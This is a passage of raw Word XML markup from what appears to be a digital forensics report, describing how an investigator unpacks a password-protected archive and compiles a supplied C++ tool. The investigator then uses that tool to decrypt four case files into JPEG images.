      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">D-A93A-A133958872F8)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3gyq7oo4kkln" w:id="70"/>
      <w:bookmarkEnd w:id="70"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Working with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Document.rar</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Readme.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FE">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I extracted the content of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Document.rar</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerISO</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool with one of the passwords provided in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Readme.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file. Inside the specified folder, we found two files:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> e_PoliceReport-CS-01</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">e_PoliceReport-CS-02</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Both files are of the type </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.File</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4186030" cy="2361350"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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186030" cy="2361350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 3: Power ISO Tool</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_a4mv0rmbfuqz" w:id="71"/>
      <w:bookmarkEnd w:id="71"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Working with .File files and encrypt_file002.cpp file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000100">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I found total four files with .File extension:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">e_IMG_0010</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000101">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">e_IMG_0013</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000102">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">e_PoliceReport-CS-01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000103">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">e_PoliceReport-CS-02</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000104">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000105">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">My suspicion that these files were encrypted increased after reviewing the encrypt_file002.cpp file. It became clear that this C++ file was used for encryption and decryption purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000106">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000107">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I accessed the folder containing the .cpp file and then opened the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Prompt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> window. There, I initiated the compilation of the C++ code by entering the relevant command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000108">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">g++ -o encryption_tool .\encrypt_file002.cpp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This command initiated the use of the g++ compiler to process the source code, resulting in the generation of an executable file named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"encryption_tool.exe."</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> This executable was intended to serve as a decryption tool.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To commence the decryption, I utilized encryption_tool.exe with a command structured as follows:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./encryption_tool [encrypted_input] [decrypted_output.abc] decrypt</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This command line instruction facilitated the decryption of the content from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">encrypted_input</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and produced the output in a file named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">decrypted_output.abc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. In our specific case, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">encrypted_input</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> corresponded to each of the encrypted files. The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">decrypted_output.abc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> represented the resulting files, which were prefixed with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'decrypted_'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to distinguish them from their encrypted counterparts. At this juncture, the actual file extension </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.abc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> remained unidentified.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To determine the correct file extensions for files with the .abc extension, I executed a Python script that tested all possible file extensions. The script successfully identified two file extensions: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.jpg and .jpeg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Armed with this new information, I carried out a series of commands to decrypt each file individually:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./encryption_tool e_IMG_0013 decrypted_IMG_0013.jpg decrypt</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">./encryption_tool e_PoliceReport-CS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="d36363"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-01</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> decrypted_PoliceReport-CS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="d36363"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-01.j</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">peg decrypt</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">./encryption_tool e_PoliceReport-CS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="d36363"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-02</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> decrypted_PoliceReport-CS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="d36363"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-02.j</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">peg decrypt</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">./encryption_tool e_IMG_0010 decrypted_IMG_0010.jpg decrypt</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Each command was met with success, yielding newly accessible image files:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">decrypted_IMG_0010.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010F">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">decrypted_IMG_0013.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000110">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">decrypted_PoliceReport-CS-01.jpeg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000111">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">decrypted_PoliceReport-CS-02.jpeg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000112">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000113">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
